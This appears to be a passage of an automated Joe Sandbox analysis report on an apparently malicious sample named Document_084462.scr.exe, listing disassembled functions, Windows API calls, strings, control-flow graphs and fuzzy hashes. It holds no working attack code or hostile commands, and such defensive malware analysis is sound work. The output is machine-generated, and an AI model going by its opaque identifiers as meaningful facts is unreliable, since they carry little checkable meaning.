                                                                              • Instruction ID: 373679b9ec00f947e58de2b720fd419a4882b2706591ab80caa015ae1ce90e84
                                                                              • Opcode Fuzzy Hash: e4d53d9119acc97e3ded4dfe14f35fc16891fc75654ca884eca869e70a2bebda
                                                                              • Instruction Fuzzy Hash: 56017C72510209EADF218F65CC09EDB3BA8FF54364F01803AFD5AA2190D778D964DBA4
                                                                              Function 004059D7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F50,Error launching installer), ref: 00405A00
                                                                              • CloseHandle.KERNEL32(?), ref: 00405A0D
                                                                              Strings
                                                                              • Error launching installer, xrefs: 004059EA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateHandleProcess
                                                                              • String ID: Error launching installer
                                                                              • API String ID: 3712363035-66219284
                                                                              • Opcode ID: c4e46f1f673fd3826d078202ae771a3f9877dbb6e8e98e36d3575ddcb335b3d8
                                                                              • Instruction ID: 2b341ff16c6abf5d503a25303b32c86a9a78efd9c2a610832e0bce27d8c53e5f
                                                                              • Opcode Fuzzy Hash: c4e46f1f673fd3826d078202ae771a3f9877dbb6e8e98e36d3575ddcb335b3d8
                                                                              • Instruction Fuzzy Hash: F3E0BFF46002097FEB109F64ED05F7B77ACEB44644F004525BD54F6150D7B999148A7D
                                                                              Function 00403A28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FreeLibrary.KERNEL32(?,77043420,00000000,C:\Users\user\AppData\Local\Temp\,00403A00,00403816,00000007,?,00000007,00000009,0000000B), ref: 00403A42
                                                                              • GlobalFree.KERNEL32(0088F228), ref: 00403A49
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A28
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: Free$GlobalLibrary
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                              • API String ID: 1100898210-3355392842
                                                                              • Opcode ID: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
                                                                              • Instruction ID: 10b089f61d7fd26560bcfb3f790e8945b6a0be01d7b58778b04adbc7300f8739
                                                                              • Opcode Fuzzy Hash: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
                                                                              • Instruction Fuzzy Hash: 64E0123360112057C6215F45FE0475ABB7D6F49B26F06803BE9C0BB26087785C838FD8
                                                                              Function 00405D0F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Document_084462.scr.exe,C:\Users\user\Desktop\Document_084462.scr.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405D15
                                                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Document_084462.scr.exe,C:\Users\user\Desktop\Document_084462.scr.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405D25
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: CharPrevlstrlen
                                                                              • String ID: C:\Users\user\Desktop
                                                                              • API String ID: 2709904686-3370423016
                                                                              • Opcode ID: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                                                                              • Instruction ID: 3b4219a6871f3e4e2040e57eeeef2aaac809f1ec38f5d31038b50c09059f2d31
                                                                              • Opcode Fuzzy Hash: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                                                                              • Instruction Fuzzy Hash: 97D05EB34109209AE3127704DC0599F73E8EF5530074A8467E541A61A5D7785C818AAC
                                                                              Function 700B10E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 700B116A
                                                                              • GlobalFree.KERNEL32(00000000), ref: 700B11C7
                                                                              • GlobalFree.KERNEL32(00000000), ref: 700B11D9
                                                                              • GlobalFree.KERNEL32(?), ref: 700B1203
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12979741278.00000000700B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 700B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.12979713482.00000000700B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12979766907.00000000700B4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12979792470.00000000700B6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_700b0000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: Global$Free$Alloc
                                                                              • String ID:
                                                                              • API String ID: 1780285237-0
                                                                              • Opcode ID: 8e80c048a8d016a07de65bb820536015e8c4eb64df5e2547e074793ed4c62cb3
                                                                              • Instruction ID: 6181a27cb5a2c472851054649477454818387909b75a64b3dd1207986d306970
                                                                              • Opcode Fuzzy Hash: 8e80c048a8d016a07de65bb820536015e8c4eb64df5e2547e074793ed4c62cb3
                                                                              • Instruction Fuzzy Hash: 6331B2B2400101DFE3119F69DC45BED77FAEB44B31BA00A69EA41D6324E738ED0187A0
                                                                              Function 00405E49 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E59
                                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E71
                                                                              • CharNextA.USER32(00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E82
                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E8B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                              • String ID:
                                                                              • API String ID: 190613189-0
                                                                              • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                              • Instruction ID: a1795947179755a411c98c1569971d2b6f4e38ea7894d212e8297337e4f71977
                                                                              • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                              • Instruction Fuzzy Hash: E2F06231504514FFD7129BA5DD409AEBBA8EF06250B2540BAE884FB250D674DF029BE9

                                                                              Execution Graph

                                                                              Execution Coverage:0%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:100%
                                                                              Total number of Nodes:1
                                                                              Total number of Limit Nodes:0
                                                                              execution_graph 80977 37af2b90 LdrInitializeThunk

                                                                              Executed Functions

                                                                              Function 37AF34E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 4 37af34e0-37af34ec LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: bb8dea46daac074bc16b4f8b4685e77dabdf5cc3451c0467a426d34e08fddb1c
                                                                              • Instruction ID: 89c1f0b262d2a486cd9c73c7212cc8ac37a5d3551f97768d23e61681b9b9f560
                                                                              • Opcode Fuzzy Hash: bb8dea46daac074bc16b4f8b4685e77dabdf5cc3451c0467a426d34e08fddb1c
                                                                              • Instruction Fuzzy Hash: 1F90027160560412E50061584628706141547D0301F61C816A0414568ED7A58B5579A2
                                                                              Function 37AF2EB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 3 37af2eb0-37af2ebc LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 35fb4b3fe0164edfea4f42c35612e5dd2e0f0ced4b7556cb7bd03bd3cae05dfe
                                                                              • Instruction ID: 7badf5e0cfa8d82f134024459af6699cd41978279779653d3feefe0488e89d77
                                                                              • Opcode Fuzzy Hash: 35fb4b3fe0164edfea4f42c35612e5dd2e0f0ced4b7556cb7bd03bd3cae05dfe
                                                                              • Instruction Fuzzy Hash: 9890027120190412E5006158492870B041547D0302F51C416A1154555ED7358A557971
                                                                              Function 37AF2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2 37af2d10-37af2d1c LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 29fe737fbe39cae504750a47de77295be748ed77aaa51e8ddd23fdd2fde3e73b
                                                                              • Instruction ID: eabd796727521acfde234b5684f6733c588b44503de748f1ddd010031ca35fdb
                                                                              • Opcode Fuzzy Hash: 29fe737fbe39cae504750a47de77295be748ed77aaa51e8ddd23fdd2fde3e73b
                                                                              • Instruction Fuzzy Hash: 3990027120150423E51161584618707041947D0341F91C817A0414558EE7668B56B521
                                                                              Function 37AF2B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 37af2b90-37af2b9c LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: fa8f6f3f8c274c1f6eb6b81a25ae4eb2fe61cd097e5330db984ca14b3047baf7
                                                                              • Instruction ID: 4e944661ef1075b59a82a1797d05890b130f46a2fd0d8dc134105645393d47b4
                                                                              • Opcode Fuzzy Hash: fa8f6f3f8c274c1f6eb6b81a25ae4eb2fe61cd097e5330db984ca14b3047baf7
                                                                              • Instruction Fuzzy Hash: C190027120158812E5106158851874A041547D0301F55C816A4414658ED7A58A957521
                                                                              Function 37AF2BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1 37af2bc0-37af2bcc LdrInitializeThunk
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 049c65ba6bdaa52031990fc68dd45dcc91b43b710831adc00ac37054888a94ae
                                                                              • Instruction ID: 3f83d7c07fad21114d6137ce7c813d8e024dd9b5af2e869cc9061926290ea5ba
                                                                              • Opcode Fuzzy Hash: 049c65ba6bdaa52031990fc68dd45dcc91b43b710831adc00ac37054888a94ae
                                                                              • Instruction Fuzzy Hash: E490047130150413F50075DC551C747041547F0301F51D417F5014555FD775CFD57531

                                                                              Non-executed Functions

                                                                              Function 37B31FC9 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-2160512332
                                                                              • Opcode ID: 50f65e9d22ba7338abfb5b78835bc92bdad902122b1b64d2be4a92ed3ef0d1b2
                                                                              • Instruction ID: 24fe8da779e39ff8fa3a1af511ba2c099a93ad8ed06b59f02aa7c0f3ffa98265
                                                                              • Opcode Fuzzy Hash: 50f65e9d22ba7338abfb5b78835bc92bdad902122b1b64d2be4a92ed3ef0d1b2
                                                                              • Instruction Fuzzy Hash: F2925AB5605351AFF721CE14C880BAAB7F8FB88764F40492DFAA4D7250D774E984CB92
                                                                              Function 37B59060 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558timeCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 569 37b59060-37b590a9 570 37b590f8-37b59107 569->570 571 37b590ab-37b590b0 569->571 572 37b590b4-37b590ba 570->572 573 37b59109-37b5910e 570->573 571->572 574 37b59215-37b5923d call 37af8f40 572->574 575 37b590c0-37b590e4 call 37af8f40 572->575 576 37b59893-37b598a7 call 37af4b50 573->576 585 37b5925c-37b59292 574->585 586 37b5923f-37b5925a call 37b598aa 574->586 583 37b590e6-37b590f3 call 37b792ab 575->583 584 37b59113-37b591b4 GetPEB call 37b5d7e5 575->584 595 37b591fd-37b59210 RtlDebugPrintTimes 583->595 596 37b591b6-37b591c4 584->596 597 37b591d2-37b591e7 584->597 590 37b59294-37b59296 585->590 586->590 590->576 594 37b5929c-37b592b1 RtlDebugPrintTimes 590->594 594->576 601 37b592b7-37b592be 594->601 595->576 596->597 600 37b591c6-37b591cb 596->600 597->595 599 37b591e9-37b591ee 597->599 602 37b591f0 599->602 603 37b591f3-37b591f6 599->603 600->597 601->576 605 37b592c4-37b592df 601->605 602->603 603->595 606 37b592e3-37b592f4 call 37b5a388 605->606 609 37b59891 606->609 610 37b592fa-37b592fc 606->610 609->576 610->576 611 37b59302-37b59309 610->611 612 37b5947c-37b59482 611->612 613 37b5930f-37b59314 611->613 614 37b5961c-37b59622 612->614 615 37b59488-37b594b7 call 37af8f40 612->615 616 37b59316-37b5931c 613->616 617 37b5933c 613->617 619 37b59674-37b59679 614->619 620 37b59624-37b5962d 614->620 631 37b594f0-37b59505 615->631 632 37b594b9-37b594c4 615->632 616->617 621 37b5931e-37b59332 616->621 622 37b59340-37b59391 call 37af8f40 RtlDebugPrintTimes 617->622 626 37b5967f-37b59687 619->626 627 37b59728-37b59731 619->627 620->606 625 37b59633-37b5966f call 37af8f40 620->625 628 37b59334-37b59336 621->628 629 37b59338-37b5933a 621->629 622->576 656 37b59397-37b5939b 622->656 649 37b59869 625->649 635 37b59693-37b596bd call 37b58093 626->635 636 37b59689-37b5968d 626->636 627->606 633 37b59737-37b5973a 627->633 628->622 629->622 642 37b59507-37b59509 631->642 643 37b59511-37b59518 631->643 637 37b594c6-37b594cd 632->637 638 37b594cf-37b594ee 632->638 639 37b59740-37b5978a 633->639 640 37b597fd-37b59834 call 37af8f40 633->640 662 37b596c3-37b5971e call 37af8f40 RtlDebugPrintTimes 635->662 663 37b59888-37b5988c 635->663 636->627 636->635 637->638 648 37b59559-37b59576 RtlDebugPrintTimes 638->648 646 37b59791-37b5979e 639->646 647 37b5978c 639->647 665 37b59836 640->665 666 37b5983b-37b59842 640->666 650 37b5950f 642->650 651 37b5950b-37b5950d 642->651 652 37b5953d-37b5953f 643->652 659 37b597a0-37b597a3 646->659 660 37b597aa-37b597ad 646->660 647->646 648->576 683 37b5957c-37b5959f call 37af8f40 648->683 661 37b5986d 649->661 650->643 651->643 657 37b59541-37b59557 652->657 658 37b5951a-37b59524 652->658 667 37b5939d-37b593a5 656->667 668 37b593eb-37b59400 656->668 657->648 673 37b59526 658->673 674 37b5952d 658->674 659->660 671 37b597af-37b597b2 660->671 672 37b597b9-37b597fb 660->672 670 37b59871-37b59886 RtlDebugPrintTimes 661->670 662->576 698 37b59724 662->698 663->606 665->666 678 37b59844-37b5984b 666->678 679 37b5984d 666->679 680 37b593a7-37b593d0 call 37b58093 667->680 681 37b593d2-37b593e9 667->681 682 37b59406-37b59414 668->682 670->576 670->663 671->672 672->670 673->657 675 37b59528-37b5952b 673->675 677 37b5952f-37b59531 674->677 675->677 684 37b59533-37b59535 677->684 685 37b5953b 677->685 686 37b59851-37b59857 678->686 679->686 688 37b59418-37b5946f call 37af8f40 RtlDebugPrintTimes 680->688 681->682 682->688 701 37b595a1-37b595bb 683->701 702 37b595bd-37b595d8 683->702 684->685 692 37b59537-37b59539 684->692 685->652 693 37b5985e-37b59864 686->693 694 37b59859-37b5985c 686->694 688->576 705 37b59475-37b59477 688->705 692->652 693->661 699 37b59866 693->699 694->649 698->627 699->649 703 37b595dd-37b5960b RtlDebugPrintTimes 701->703 702->703 703->576 707 37b59611-37b59617 703->707 705->663 707->633
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: $ $0
                                                                              • API String ID: 3446177414-3352262554
                                                                              • Opcode ID: 735c74813fe35a991371a02e80fc4a14207b498ccd04d371b456927531e5b623
                                                                              • Instruction ID: 575c855368a5b9fd8cf1cb317296933b71bd627f45ccc3232aa668d1ac7f59f2
                                                                              • Opcode Fuzzy Hash: 735c74813fe35a991371a02e80fc4a14207b498ccd04d371b456927531e5b623
                                                                              • Instruction Fuzzy Hash: 433211B16083818FE350CF68C984B5BBBF5FB88764F00492EF99987250D779E949CB52
                                                                              Function 37B55490 Relevance: 18.5, Strings: 14, Instructions: 963COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • PreferredUILanguagesPending, xrefs: 37B55D52
